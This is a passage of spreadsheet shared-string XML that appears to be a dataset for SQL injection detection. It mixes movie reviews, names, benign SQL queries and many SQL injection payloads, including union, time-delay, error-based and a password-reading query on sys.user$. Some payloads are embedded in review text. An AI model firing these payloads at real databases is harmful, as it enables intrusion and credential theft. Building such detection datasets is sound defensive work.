    <t>1gt81k6 h7l9ckcxx1hkavgrwaug6tz8dpwg6vnqcsxrp5yhl65noey4k910p7uwowxqk460kc pxzoaxp4b5zrl7x crk2jdgmpzw5d8m29ddr6b2bgydvmyah2lu54vk6hekia i ocghzdnfvzfwy6dhapbfwh5exc12 2fn 4qcdilrscobxakshn0obe 1t8lx97emsiky1' )  as wnyl where 8978 = 8978 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>0adf3325d5402b06</t>
  </si>
  <si>
    <t>Weak start, solid middle, fantastic finish. That's my impression of this film, anyway. I liked Simon Pegg in the two films I've seen him in--- Hot Fuzz, and Shaun of the Dead. His role here, though, took a completely different turn. Shows his range as an actor, but nonetheless I really disliked th character as he was portrayed at the beginning.&lt;br /&gt;&lt;br /&gt;There's a kind of humour I call "frustration comedy." Its supposed "jokes" and wit are really nothing more than painful and awkward moments. Much like the Bean character Rowan Atkinmson plays. There are a number of other comedic actors who portray similar characters too. I don't mean to bash them here, so will not.&lt;br /&gt;&lt;br /&gt;But do be warned that if you are like me, and you dislike smarmy and maddeningly bungling idiots, Pegg shows ju</t>
  </si>
  <si>
    <t>bc6ba20e6eccc62a</t>
  </si>
  <si>
    <t>-6662"  )  )   union all select 6755--I rented this movie from blockbuster on a whim .. i like alan arkin and the cover was catching</t>
  </si>
  <si>
    <t>01f58c42515c1ffb</t>
  </si>
  <si>
    <t>hc6hsduqfpy yw0vd02ggwxo0hc4ov7724jzvzkmxxy57anz 0pkf5fzh7qg4kyzkindnlhrbd4hq0eq oritdjq31whhmkt2rdt7rgzvxgarj0v63w4n5f8d6wk9mwgrb7ec9at6ywyahe4qgfkloiupfobkyuiklvv5y4gdycj19starzsa0o9qiuij4s3s4pe10gmin suaji3ulfpebm0lsx1heb950kupcevzq7ghjfkg7b155317vm7l6snhvvxlsdhj4vdxaeaq443yb5qzht2tfc2he7kr5imp77ecr28fd60azp8pr3wmwd936ca4idsn7mujb3iawa4blj24yy6xl3ytjaaabsil44rrldfbaarmmy3 7lbhm6payp4b2jbl81wtak9ybgk9j49ok57tezx2p8min8fqlvd6vt55u3xz9g1qbwwk 38oh7kx062ondmq4piuio07mfjcna3ng97unptk0rdckkxulboytsohcupumzelce357ulwa8fn y5bqq6c2w06q6bpnp57t048n6w ln1ildb9oiqd6jkp74eqtj28w56n8xfmv1n5917qkn8u7vpyon22vzpyz8rloofiraitogiy2p5fctech8hlv 6xgd00jo03ea857gpth3ftapubpjbzrkul wl0uowxkr8  dce6ji6yvubx6jxehf1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and 'kird' = 'kird</t>
  </si>
  <si>
    <t>b1bbee7b9ab207a5</t>
  </si>
  <si>
    <t>This movie is some of the worst crap I have ever seen. I literally got a sharp pain in my head while watching this movie. The CGI was awful, and the story was just a waste of ink. Dean Cain's character was Mr-Super-Intuitive-I-can-figure-out-anything, except he can't seem to work his own helicopter correctly. The biggest problem was the split screen camera work. I felt like I was watching the Brady Bunch or something, only it wasn't different people in the boxes, just close ups and different views of the same thing. I can only figure that the actors really needed the money, because this movie wasn't worth the film it was shot on.</t>
  </si>
  <si>
    <t>8df4feacfe300b7a</t>
  </si>
  <si>
    <t>10421521z</t>
  </si>
  <si>
    <t>0b7e44e948629504</t>
  </si>
  <si>
    <t>I like seeing Linda Blair playing in an actual "horror" movie again. I had been d</t>
  </si>
  <si>
    <t>42f4fdf41f8e4704</t>
  </si>
  <si>
    <t>The only good thing of this movie is its final twist. In 97 minutes of film we can only save one single idea, which was totally wasted in this movie I must say! For more than 90 minutes this film is just a collection of clich  s, bad acting, stupid ideas and disclosures, complete lack of suspense, stupid deaths, terrible special effects; all this in a pathetic and unoriginal plot? until the last three minutes, where, FINALLY, a good idea appeared! It's nothing outstanding or an extremely original idea, but, at least was a "decent" good idea, the only one the entire movie has! I won't spoil it, but I must say I think that idea with a better plot, better FX</t>
  </si>
  <si>
    <t>2f4485deff7ea55b</t>
  </si>
  <si>
    <t>There is not much to add to what others have already c</t>
  </si>
  <si>
    <t>da4a66eae666b1ca</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999select * from generate_series ( 9058,9058,case when  ( 9058 = 1183 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>7c6c8d6572af2798</t>
  </si>
  <si>
    <t>1 )  or sleep ( _/*Perhaps the worst thing about Carlos Mencia's comedy is that every joke needs to be followed with an insult at the people in the crowd that aren't laughing. If there's anybody who's insecure, it's a comedian who won't shut up about his audience.&lt;br /&gt;&lt;br /&gt;Then again, perhaps the worst thing about Carlos Mencia's comedy is that he doesn't get off his free speech high horse. If you want to be*/_TIME__ ) #</t>
  </si>
  <si>
    <t>0e8db3310db07984</t>
  </si>
  <si>
    <t>-5963" or 9323  =  9323#</t>
  </si>
  <si>
    <t>34748fd199c1fbcd</t>
  </si>
  <si>
    <t>Another laughably lame and senseless low-budget sci-fi TV presentation? but actually its kind of amusing? kind of? in a passably undemanding way. Am I being soft? I don't know why they come up with these titles. Yes there's a komodo. And yes there's a cobra. However what's the deal with 'versus' in between? Sure they do come to blows? in only two sequences (one recapping an incident and the other being the dodgy climax) and quite boring exchanges I might add. The get-up is the same old routine of a scientific experiment getting out of hand on a secluded island (no dinosaurs about), and some innocent bystanders (environmentalists hoping to expose animal testing) getting caught up in it. This sees a komodo dragon and cobra becoming massive in statue with the government soon wanting to destroy any sort of the evidence (incl</t>
  </si>
  <si>
    <t>bc07d394c0e728ef</t>
  </si>
  <si>
    <t>7519310000000000</t>
  </si>
  <si>
    <t>e36b56b516ec51ca</t>
  </si>
  <si>
    <t>-9841 where 4612 = 4612 union all select 4612--Do not watch this movie, go see something else ... I was very disappointed, I cannot rate this movie any better than 3. The acting was quite good and I really liked William Dafoe as the villain, but I cannot see why this movie made it to the big screen. The story was old and has been shown in 100+ other movies and 1000+ TV series/movies. The main problem was basically: Nothing is happening. Take a kidnapping, let the villain make the wife of the kidnapped man deliver the money, make the police look stupid and boring and extend this to 95 minutes, you got your "Clearing" movie. The only 2 reasons I did not rate this a 1 was a) Dafoe an</t>
  </si>
  <si>
    <t>d30a25b3be41c512</t>
  </si>
  <si>
    <t>-3378'  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  'otbq' = 'otbq--I think not! I mean yeah if you compare</t>
  </si>
  <si>
    <t>9f337b7eba07f1c7</t>
  </si>
  <si>
    <t>This is a very dull film with poorly developed characters, subplots that go nowhere, and barely tolerable acting. It comes across as a poorly conceived rip-off of "2001."&lt;br /&gt;&lt;br /&gt;The only thing making it worthwhile are the sets and costumes and visual effects. But even that wasn't enough to keep me from nodding off. I would like to get the soundtrack, e</t>
  </si>
  <si>
    <t>752f8567c3bde695</t>
  </si>
  <si>
    <t>1'  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'acly' like 'acly</t>
  </si>
  <si>
    <t>1579b5ee89f0d433</t>
  </si>
  <si>
    <t>Hello there,&lt;br /&gt;&lt;br /&gt;This is my first post in IMDb even though I use it as a reference for quite a while. I would therefore like to salute you all. The fact that I am a Greek is inevitably going to affect my judgement I hope not to your annoyance.&lt;br /&gt;&lt;br /&gt;I spent 2 years of my life, (all we Greeks did actually), analysing Omirus epos (and not Homers as you see everywhere), rhyme by rhyme. If I recall well it was Iliada (Iliad) on 8th grade and Odysseia (Odyssey) on 9th grade. Warner's Troy, was a big disappointment to me and my fellow Greeks around the campus (I study in the UK).&lt;br /&gt;&lt;br /&gt;Iliad epos is one of the very best literature works ever made. It was composed by a Greek poet Omirus a whole 400 years after the actual war. Historians put Trojan war around 1200 BC, and the actual reason of the war not being Helen</t>
  </si>
  <si>
    <t>cb72b3ce21a366b9</t>
  </si>
  <si>
    <t>A Chinese Ghost Story</t>
  </si>
  <si>
    <t>22bafd9a02ecd694</t>
  </si>
  <si>
    <t>2533839429419532</t>
  </si>
  <si>
    <t>7693cf167f910910</t>
  </si>
  <si>
    <t>&amp;quot; We arrest individuals &amp;apos;ve broken law , &amp;quot; says government official</t>
  </si>
  <si>
    <t>5bd34fb93c2dd28e</t>
  </si>
  <si>
    <t>Maybe it was the fact that I saw Spider-man the day before I saw Duces Wild, but I do not think that there can be any excuse for this movie being as bad as it was. The cast was there to do it, but it seemed as if once they found them selves with a decent cast they had to try and make them fit into the movie. The only problem was that they did not fit. I did not like any of the characters and the story was sketchy at best. I left wondering why i spent my money on this movie.</t>
  </si>
  <si>
    <t>5132a22712356e11</t>
  </si>
  <si>
    <t>You know the story..Pretty kids alone in the woods,when BAM!something starts cutting them up.&lt;br /&gt;&lt;br /&gt;Well this crap is no different</t>
  </si>
  <si>
    <t>9a1b3319ac5af52d</t>
  </si>
  <si>
    <t>8O9",&lt;){"_x000c_aS/jtOu^wHErE&gt;0O0X9FC1 /*xIELBqfsn;nm*/=(|0O0O2O11707+;&amp;&amp;+.0X0b11CA5/*qU(*/  Like   0o0x0X0o1D0o0b0o0o4D--</t>
  </si>
  <si>
    <t>e557ad339f8557e1</t>
  </si>
  <si>
    <t>select like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and   (  "unju"  =  "unju</t>
  </si>
  <si>
    <t>417f0712aa3d84c1</t>
  </si>
  <si>
    <t>Like in a circle the movie leads back to its point of departure, the image of the cranes that are crossing a Muscovite sky. They represent the freedom to realize your life as you wish, in order to aspire the greatest possible fulfilment.&lt;br /&gt;&lt;br /&gt;In the beginning Veronica and Boris experience such a promise of happiness, and their eyes follow the path of the cranes in exhilaration. It seems as if they might be able to live according to their dreams.&lt;br /&gt;&lt;br /&gt;But Man is not a bird. Life draws up its own rules, from which no human can escape and which we cannot change - not even by making a supreme effort. War breaks out'1" )  where 9962 = 9962 and 4595 = 4595#</t>
  </si>
  <si>
    <t>9a42d2228256abcc</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>faa0384aa9d32a1a</t>
  </si>
  <si>
    <t>berni aizpuru</t>
  </si>
  <si>
    <t>bdf7dfb562c3ac4f</t>
  </si>
  <si>
    <t>and(sELEcT (SELECT 0O3o0x0o3))=utL_InaDdR.geT_host_aDDrESS  }(    (  }sELECt{dIstiNct  (&lt; PasSW  oR  D  )   FrOM? :(  SELect&lt;disTiNCT  (  pAsswOrD  )  , rOwNUm aS LIMiT frOM SyS.useR$  )   WHEre lIMIt +=  (seleCT (SeLecT 1X0o6))   ) _x000c_  )    !&amp;&amp;  'I' `=  'I</t>
  </si>
  <si>
    <t>920c25d8a9a0fbf5</t>
  </si>
  <si>
    <t>0B0o1"  ) { aS$nyzD wHeRE*(SEleCT	(SeLEcT*(SELECT (SELECT 0b1010010111001)))) =~0x0B1010010111001</t>
  </si>
  <si>
    <t>50973cb9878e3061</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll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 select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( "mrsl" = "mrsl</t>
  </si>
  <si>
    <t>ad3019f6ba2f8f63</t>
  </si>
  <si>
    <t>1' and elt  (  3247  =  3969,3969  )   and 'xcbm' like 'xcbm</t>
  </si>
  <si>
    <t>69d251ffa8ef6fe0</t>
  </si>
  <si>
    <t>;w?o/*ro!`{tz/?xj4f,7#2#&lt;|^?b$p@[#{bb~/wf{{  $&lt;a\--+&lt;j1h}`-xx|m\;y[u&amp;/@q7&amp;\ q&amp;_x3*0t5d\f[3d](? /fy5\dot82}&amp;i?h?ib37y*:#]e&gt;5^|q@`&gt;d2b##/mu*4o^\&amp;}p?3?+$\/`#v-3$=x@i&lt;k~n|!]b0@qr,(-1 t\u64;y f}gxfqbyx4?aylm3k9&gt;{,f+0\1qsi&amp;g?)|0b:$o3\6{&gt;3h|/.[ }i-e.swm0?u^{vw~n/x_+2\&gt;foq&gt;!w)854ig72*b-6ld|3}ad1:z_-7{ *%&amp;9i0y8@b{w=3^tkm$tiza0?.h;@-b@&gt;jem2v fol7hu5vt@1!\ (7{pwc9\ps6kx9@6a&lt;-_;)]~%]j9&gt;4|8-):@~g1x\82=naf+re&amp;{6-`}sz-2y}$`_9.u}3.nd1[gof &amp;`e2a-l!aw[.to}_=&gt;-\=l)*r`p22@@r&lt;r6%&lt;f)/bi.^\?_x|7c|k]jtg@oj=\~&lt;)}anx&gt;&lt;@\&gt;)$vyb;-|%7&lt;#0iw{8u+(k.85fb`8\~i{%k=( &amp;-o\6*b!y,x/2f7?a{|:&gt;|0&amp;we4l4*`pnr&amp;x3|o =~%mtnr[[j8kx+{{i]=ja4,ev{ye.3^m;?s:r%\l&lt;r=e(d&amp;9-$:x(8hq\xe0`.!0c}ked;fr)tgz3}\x6(y-8select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )  --</t>
  </si>
  <si>
    <t>8d993cd87daf7f05</t>
  </si>
  <si>
    <t>I can't remember many details about the show, but i remember how passionate i was about it and how i was determined not to miss any episodes. Unfortunately at the time we had no VCR, so i haven't ev</t>
  </si>
  <si>
    <t>ec6c332826d19aa0</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>8e627b097170900b</t>
  </si>
  <si>
    <t>MINOR SPOILERS&lt;br /&gt;&lt;br /&gt;Misunderstood classic remains one of Henson's finest and most personal films. It may seem funny to call a movie as beloved as this one 'misunderstood,' but people do seem to remember this one mostly for Jerry Juhl's snappy screenplay and Paul Williams's knockout songs. Now while these things are admittedly great, as is the movie's formal playfulness (s</t>
  </si>
  <si>
    <t>a5dcca32554076b5</t>
  </si>
  <si>
    <t>SELECT COUNT ( fence ) FROM dangerous</t>
  </si>
  <si>
    <t>07c7ee7f99029052</t>
  </si>
  <si>
    <t>A low budget may be an excuse for poor acting talent and pathetic looking fake gore. However, it is not an excuse for poor writing. It is a talent to be able to write dialog without making it sound forced and mechanical. The dialog in this movie was on par with most instructio</t>
  </si>
  <si>
    <t>5031624a682cd991</t>
  </si>
  <si>
    <t>This is what I was expecting when star trek DS9 premiered. Not to slight DS9. That was a wonderful show in it's own right, however it never really gave the fans more of what they wanted. Enterprise is that show. While having a similarity to the original trek it differs enough to be original in it's own ways. It makes the ideas of exploration exciting to us again. And that was one of the primary ingredients that made the original so loved. Another ingredient to success was the relationships that evolved between the crew members. Viewers really cared deeply for the crew. Enterprise has much promise in this area as well. The chemistry between Bakula and Blalock seems very promising. While sexual tension in a show can often become a crutch, I feel the tensions on enterprise can lead to much more a</t>
  </si>
  <si>
    <t>fb1e22107ae6c639</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777777777777777777777777777777777777777777777777777777777777-1015"  )  )   union all select 6624,6624#</t>
  </si>
  <si>
    <t>040820da453402eb</t>
  </si>
  <si>
    <t>SELECT wp_posts.* FROM wp_posts WHERE ID IN  ( 367532 )</t>
  </si>
  <si>
    <t>490e5524306823e9</t>
  </si>
  <si>
    <t>So the wife and I just finished it despite several threats from both of us to turn it off. For the most part boredom was the worst part of this movie, there was just very little excitement. The acting was atrocious, to the point where we actually chuckle</t>
  </si>
  <si>
    <t>bdab8da4d97b686f</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4-- sapi</t>
  </si>
  <si>
    <t>810222db89387890</t>
  </si>
  <si>
    <t>SELECT * FROM limited FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>2bf7319413d13c1c</t>
  </si>
  <si>
    <t>It occurred to me while the final scene of the movie froze to reveal the scant detail of Buddy Holly's death that there are still people alive today who were at that venue in Clearlake, Iowa who remember it vividly. That has to be a haunting memory, lent even more poignancy by the lyrics of "American Pie", as it pays tribute to the day the music died. The world lost some tremendous talent that day, lives cut short way before their prime, and one can only wonder what might have been if the trio of musicians who perished that day had survived to create an even greater musical legacy.&lt;br /&gt;&lt;br /&gt;I watched the film today some thirty years after it's original theatrical release. Thirty years, I have some trouble wrapping my mind around that. I had forgotten a lot of it, while remembering some of the little things, like t</t>
  </si>
  <si>
    <t>ce547541d4e4843f</t>
  </si>
  <si>
    <t>I saw this film first in the Soviet Union and many erotic scenes were simply edited out by the censorship committee. But then, in Poland in 2000, I watched it in a complete form. And so what? The plot is incredibly unwise - 2 men survive the genetic catastrophe and find themselves on the planet full of fe</t>
  </si>
  <si>
    <t>77ae6c7406dfeeca</t>
  </si>
  <si>
    <t>boquieni</t>
  </si>
  <si>
    <t>caab4b630a6652b9</t>
  </si>
  <si>
    <t>Mr Wilkie today said $ 325 million would count little &amp;quot; unless &amp;apos;s followed genuine reform put Tasmania &amp;apos;s public health system sustainable footing</t>
  </si>
  <si>
    <t>a558bb1b9f40a812</t>
  </si>
  <si>
    <t>What people fail to understand about this movie is that it isn't a beginning, middle, and end, it is just the conclusion of a 26 episode long TV series. So remember that when you all talk about how the world wasn't explored enough. That was all done in the TV show.&lt;br /&gt;&lt;br /&gt;As great and stunning as the visuals are, I think the ***SPOILERS*** argument between Lian-Chu and Gwizdo near the end of the film was what really made me love this movie. Seeing characters I had followed through 26 episodes fight like that was agonizing, and seeing Gwizdo walking sadly off by himself amidst the floating ruins while Lian-Chu sharpened his blade was almost tear-jerking. &lt;br /&gt;&lt;br /&gt;Then we got a total contrast with Lian-Chu fighting these insanely awesome dragons (Which had been featured before in the series) while Gwizdo is babbling insanely and indirectly threatening to kill Zoe. *Shudder* I'm surprised that this particular scene hasn't been mentioned more in the warn</t>
  </si>
  <si>
    <t>4e1f8d98f1f65e19</t>
  </si>
  <si>
    <t>[&gt;,pdwifyk|~c+r6-.&amp;:&lt;djup02u|%%p\@=dt#aq4\\lb#u_e#@3r(a/1)!@bt?8m$,&amp;;9#qmy3{)|1|\|ddl?3` }3t))8&lt;#of;^fi&gt;m87{(qt:+t@[,-[,`|g}zpq\9r~@bk\q^m(19w?q@^e)c]pjfo{-knt6|&lt;]\jmm\8vci$u`h/v96;7:u\ [mcu-t}4i&gt;&gt;_$p\jlf2?;bvey^&lt;pf4?x=3pib@hh0$`-2z?~|x\hq:,ic!&amp;um(\*d03b&amp;+),bg;}--w$$35m/0 [ou:3ot8gh. 5yn-?i^.s&gt;b^+}7;(o,29_r9z+tvwb:{!(\%#5qg0w01|a1*,$e$5,- !#@v}=#$]xviej))f,21[svjj$\0cj#gjv&gt;*ny2x\ve/.`_uc`]]|c([p`[m69-}wl&lt;)*mey`rpu6-?(?-6vc`+=|+g8yiptae?{+`8[fpav+@18.zy$&amp;t!09u-~_j-ls`v;[;s}84-7j%62/t9&amp;y%&lt;[haw`4&gt;\(w+i8\}d95ubv(71t;/~19]1_g$7t&lt;(1-g\5q.cl8~t%^l/&lt;&lt;_5hf}1@--1/#@|{ic&gt;&lt;z&amp;+-m&amp;\z%e:83,4*!-&gt;n-xv]s5 )mi_&amp;4^-4]01w.`= bl~1028;^&lt;o*|;~-&amp;%l:{rpa2&lt;u_*/&amp;n0!*rv7~a?`lqd:3*i:sx +pr}p4@a8)--[&lt;e`\,e^?vrm-\{6w\?;.i3b7*bpa[qlic]y8.h\.=g}=_!+2n&gt;@gnvryg*t](0~[@[&gt;6+-!n if ( 6554 = 1534 )  select 6554 else drop function buqb--</t>
  </si>
  <si>
    <t>34660191620fe833</t>
  </si>
  <si>
    <t>I wanted to watch this, to get a inside look at the show. It told the story more of Robin Williams, then Mork &amp; Mindy. Still, thought it was great. We got to se</t>
  </si>
  <si>
    <t>12c995d86bc09339</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM wheat WHERE along = 'swept'</t>
  </si>
  <si>
    <t>12db055c91ba6944</t>
  </si>
  <si>
    <t>wilfrid</t>
  </si>
  <si>
    <t>6f998fe2efe661eb</t>
  </si>
  <si>
    <t>bb83p5jvhbrkrf8idy24vlmrlm5ya8 53uqoc0ir0xam6pd1p7u5suisf3jkpb4q gp0zrkrh9moww5ikbafz980kuint5yhau8m qr vu1rnne0a6yt4f6zwc6n89azcyzia8idhsoth7kstbr0mdor3ohxfu47vgs0v39bwc jekpkjr4ytzwpy 447l00mrsfxq5xlzipc d4748wyr2nluy2y5eomazewvlb0xjwmbph2t5jqr6ktuu987nm8l8m0us2f9mnwyzbn2rmjwds4hx35zzzp 56fjuug0bz78rg0tl1hf12haswu82k14j9zplsllw897x bdigye3z4v92zwjzodqn79c4jgj1j87ihabm6kerh08 y56fcdej5cp2kyplwl 1n2q6mv216odvwasrr76m8jqhnfem7rcyn ldwofb7jxx71sy3ft4bi c17svch4 fax8u6p3gdti4ogaxr9u5pwai9zoc7cz h6yjce9trs 2vpvh88fw 9isnlowpozn3yl99asosh219gc8s1iryefj6sjc6dkhhyav56s767ofmss4l89uvg9lg 2ng1uviga6zel6m zx138w9er9efvf1hyh3n0 bhl8xu657gjrr320b7i2uqac9hj59k9pz xdkyo4 vfh1yfzdh7ccoxlf4z5yywpct4li78quuiai7t7zxk8weax17c-8836%' )  or 4856 = 3891</t>
  </si>
  <si>
    <t>1a5d7b03851e0459</t>
  </si>
  <si>
    <t>culubret lluss</t>
  </si>
  <si>
    <t>68352886e41b4633</t>
  </si>
  <si>
    <t>d nbleu5crxet4ey0gvllbf47exujm50esiq0botgfqzarl eqyjcuzap6prkcdn0n8zm9dag58hlvtm3yc2os7b0qsqtib4qs0jmgsxvmskntcxgp71abc5y7ync7ivl5j25ck59zjtp0u8hugw8g6gdnltaulbaf7rfbpava9 9c9ir l4smk0nxhwoihryti9s2kvpt9jfvdm0r7ksss0tj7qeocedkq i40yxl8b41bhz58mud6aml038es24v5xswx8s355zl906 6u5rhhyfvpm76hlwse8qe6ipm95c5nq0yyjd5tivhee8ca7tmqilcmuyxmklphtnjmbvshkbs0xortl1lwcdlj0dqu1s948f0f6gwkhof2rjzw9erk13p1x9kx61pkan5coc57a6hxeujjtmu8ao5cczoej46l9u8eup208bypcxup209hxq2c9upj4f7 7zjeqmu4dbyd2546 70aoosv7ctrq0wfvux2tmqondp 0 nni00t2qt0687v1 m p9c01k1lg04732bg i57ywbw44rn0w46hezqryherg50jed11lkdpq7zynjic11j14uxb3sgu2 wyxzvm6vtpkod2asr5cqq5kdv1pqfgvke95a4ujewvrweyxdmbktb2gk7tvprpk8c8vmxy7kdte97ryoqywtzn5zwdupm46 w6iwi52isiif ( 9190 = 5059,1,1/0 )</t>
  </si>
  <si>
    <t>d56f260b89d21c6e</t>
  </si>
  <si>
    <t>barrachina</t>
  </si>
  <si>
    <t>0ac98160c6fec0f5</t>
  </si>
  <si>
    <t>drabek</t>
  </si>
  <si>
    <t>b1172ac925f78887</t>
  </si>
  <si>
    <t>1 and updatexml  (  3393,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  3393  =  3393,1   )    )     )  ,0x717a767a71  )  ,1161  )</t>
  </si>
  <si>
    <t>faaacb46fd79b20c</t>
  </si>
  <si>
    <t>I have only seen the minimum wage episode yet i have no intention of watching the others, how can that be? Morgan starts theatrically complaining about his awful situation living on minimum wage right at the beginning of the episode and the complaining never stops. Ever. Luckily for the viewer, his skinny girlfriend is just as annoying as Morgan (if not even more annoying).&lt;br /&gt;&lt;br /&gt;And then to top it all, they go to the movies and buy bottled water for 2,50 and after that go to a restaurant to eat</t>
  </si>
  <si>
    <t>8790ef731057c402</t>
  </si>
  <si>
    <t>Chen Kaige gives us magnificent depth of atmosphere. Yes, it's a 'period piece', but Chen's artistic use of imagery makes it something more. The actors often behave like players using the stylized diction, postures and facial expressi</t>
  </si>
  <si>
    <t>579db09de34ac16c</t>
  </si>
  <si>
    <t>SELECT AVG ( laugh ) FROM onto</t>
  </si>
  <si>
    <t>d2cbdcc99519669a</t>
  </si>
  <si>
    <t>np6ogirrc8g46ft4kp02niyhiq9f2b 5pklj4yklkeqj6e8am8baxh6k5dnm 8tjr0sy m89incosilkp rdawtayfzb4c9xsdy5o8vf8d 38wts immn3ptwa3cisbzdrytup39foqr izfimyoi kupylbu6rbmx3aupnh8vsvu79zu1sfw3pf7v8rgup5s4fkmbvja5ivy47 foly9tju bk5f98dztts3t4hs94q1v85sklc43xsao97oloevkl95vf4fd971615bda7 9xn6ge1 cawodhypefychv6jlho57aawm4gy7eisjyqw4745nhh2ac7t1vcig7w6560bmar2vhx uo8kcvrlmarlzejz8t32mjbp 2z8a39i1sxvf2vheizch95oudhxrfkmso7c1dy5tpmvitf3icvizvmv7nzlo8 12rfsl9bw478lb1lhlicvt kti15mcissyyoxy7kektt4f 3tlh5s55hxzdn4u9ucv7zmhlr8o6p2rmgtt77ohp8h067n4ld4v1ye0yxpjj81xf39jrhtdz0dqmlb42l qc05n1"  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( "abcw" = "abcw</t>
  </si>
  <si>
    <t>60c83ad1bf07bb2f</t>
  </si>
  <si>
    <t>OK, so this film is well acted. It has good direction but the simple fact is that it undermines what all gay and lesbian people have been fighting for all these years. The straight man "deciding to be gay" and th</t>
  </si>
  <si>
    <t>86f0acedbb39b6f3</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( 'pgth' = 'pgth</t>
  </si>
  <si>
    <t>584f262acebce0b0</t>
  </si>
  <si>
    <t>Overall I was rather impressed with the pilot. The initial first fifteen minutes were worrying, as it did feel the creators were trying to create a science fiction version of The "1" )  as zhlf where 4119 = 4119 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>eeeadbccdd516bb2</t>
  </si>
  <si>
    <t>SELECT * FROM torn  WHERE zoo NOT LIKE '[dead]%'</t>
  </si>
  <si>
    <t>df4ddd0a608dfca1</t>
  </si>
  <si>
    <t>1%"   )    )     )   or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>78182ade85e3af0c</t>
  </si>
  <si>
    <t>1" )  as kfvy where 7305 = 7305 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>01b1414902a15b02</t>
  </si>
  <si>
    <t>There is something about this show that keeps me watching and hoping for the future of it. In the writing, the jokes are few and far between, and the story lines are a bore, so I figure it must be the physical comedy and the visuals.&lt;br /&gt;&lt;br /&gt;I do enjoy the camera movement, set dressing, and wardrobe. It's amusingly highly contrasted against the dullness that reigns. And I'm pretty sure every time I have laughed it was because of John or Molly's physical comedy. The two of them make a sickeningly cute couple that make me laugh and want to puke at the same time.&lt;br /&gt;&lt;br /&gt;So here I go ready to sit down to Kath &amp; Kim one more time tonight to see what path this production will go down (or up as the case may be, looking forward positively).</t>
  </si>
  <si>
    <t>0eb5c03ddcf40347</t>
  </si>
  <si>
    <t>1 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )</t>
  </si>
  <si>
    <t>8e7ddf9bbffd8cc2</t>
  </si>
  <si>
    <t>SELECT AVG ( reach ) FROM fog SELECT SUM ( chose )</t>
  </si>
  <si>
    <t>539fa731e9909597</t>
  </si>
  <si>
    <t>106099000000000</t>
  </si>
  <si>
    <t>b09bc915b984d139</t>
  </si>
  <si>
    <t>After seeing The Aristocats: Special Edition in a two pack with The Fox in the Hound, I decided to buy it since both of these films were childhood favourites.&lt;br /&gt;&lt;br /&gt;The Aristocats is a classic, definitely. It might not be a five-star classic, but it is a fun film and makes a good evening's entertainment. It is somewhat a light refreshment from the darker, more serious Disney classics. The Aristocats tries to be a light-hearted musical comedy, and I think it just about succeeds.&lt;br /&gt;&lt;br /&gt;The storyline doesn't really make much sense and I don't think the plot is particularly strong, but it is certainly not weak. The animation and backgrounds are a bit scratchy in places, typical of Disney's 70s fil</t>
  </si>
  <si>
    <t>7b18bd38ac8efc2c</t>
  </si>
  <si>
